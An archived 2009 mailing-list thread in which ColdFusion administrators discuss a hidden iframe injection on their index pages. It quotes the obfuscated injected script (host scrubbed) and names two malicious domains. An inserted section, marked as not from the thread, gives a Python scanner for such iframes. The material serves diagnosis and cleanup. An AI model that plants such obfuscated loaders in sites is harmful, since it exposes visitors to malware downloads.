It's an iframe injection hack. It will insert a hidden frame into any
index.* page it finds.
Some URL entries inserted are 'goooogleleadsense.biz/?click=*****' and
'mediahousenameshopfilm.cn/in.cgi?income29'.
Change FTP passwords...


-----Original Message-----
From: Nick Gleason [mailto:n.glea...@citysoft.com] 
Sent: Monday, April 06, 2009 4:28 PM
To: cf-talk
Subject: RE: Question about hack


William,

That's a great post - we're re-reading it now.  However, this situation
seems to be code in the index.cfm page, not something being appended from
the db.  So, I'm not sure if that post will be relevant in this case.

Thoughts?

N

> -----Original Message-----
> From: William [mailto:will...@seiter.com] 
> Sent: Monday, April 06, 2009 3:50 PM
> To: cf-talk
> Subject: RE: Question about hack
> 
> 
> Do a search on this list for 'exec('
> There was a big to-do about this last summer.  Probably in your database
> 
> 
> 
> -----Original Message-----
> From: Nick Gleason <n.glea...@citysoft.com>
> Sent: Monday, April 06, 2009 2:19 PM
> To: cf-talk <cf-talk@houseoffusion.com>
> Subject: Question about hack
> 
> 
> Hi there.  We've just seen a hack attempt that we haven't 
> seen before and I wanted to get feedback.
> 
> The symptom is that some script code is inserted at the 
> bottom of certain pages (e.g. index.cfm).  The script (which 
> has been scrubbed) looks like this:
> <script><!--
>        var applstrna0 = "<if";
>        var applstrna1 = "rame src=http://said7";;
>        var applstrna2 = ".[BAD URL HERE]";
>        var applstrna3 = " width=100 height=0></i";
>        var applstrna4 = "frame>";
> document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
> //--></script> 
> 
> The script downloads malware, which we obviously want to 
> prevent.  We're trying to determine how it's getting in 
> there, whether through an old site with inadequate code or 
> the OS or something else.  Any thoughts?
> 
> This is on a server running IIS 6 / CF7.
> 
> Thanks in advance,
> 
> Nick
> 
> 
> 
> 
> 
> 
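For the cleanup side of this thread, the following is an added example (not code from any poster on the list) that walks a web root for index.* files and flags hidden iframes, including ones assembled from split string variables and passed to document.write as in the scrubbed script above. The function names, the zero-size/hidden heuristics and the sample with its placeholder host are assumptions made for illustration.

```python
import re
from pathlib import Path

VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')   # var NAME = "literal";
WRITE_RE = re.compile(r'document\.write\s*\(([^)]*)\)')         # document.write(a+b+...)
# An iframe collapsed to zero width/height or hidden through inline style.
HIDDEN_RE = re.compile(
    r'<iframe\b[^>]*(?:\b(?:width|height)\s*=\s*["\']?0(?!\d)'
    r'|display\s*:\s*none|visibility\s*:\s*hidden)', re.I)

def assembled_writes(text):
    """Rebuild each document.write() argument from string variables and literals.
    Handles only plain `a + b + "lit"` concatenation, the pattern in the thread."""
    variables = dict(VAR_RE.findall(text))
    for call in WRITE_RE.finditer(text):
        parts = []
        for term in (t.strip() for t in call.group(1).split("+")):
            if len(term) >= 2 and term[0] == term[-1] and term[0] in "\"'":
                parts.append(term[1:-1])               # quoted literal
            else:
                parts.append(variables.get(term, ""))  # known variable, else skipped
        yield "".join(parts)

def find_hidden_iframes(text):
    """Return (source, markup) for hidden iframes written literally or built at runtime."""
    hits = [("literal", m.group(0)) for m in HIDDEN_RE.finditer(text)]
    for html in assembled_writes(text):
        hits += [("document.write", m.group(0)) for m in HIDDEN_RE.finditer(html)]
    return hits

def scan_webroot(root):
    """Check every index.* file under root; returns {path: hits} for flagged files."""
    report = {}
    for path in Path(root).rglob("index.*"):
        if path.is_file():
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample shaped like the scrubbed script in the thread (placeholder host).
SAMPLE = '''<html><body>Welcome</body></html>
<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://host";
var applstrna2 = ".example.invalid";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>'''
```

A plain text search for `<iframe` finds nothing in the sample because the tag is split across variables; the scanner reports it only after rebuilding the document.write argument.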



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321369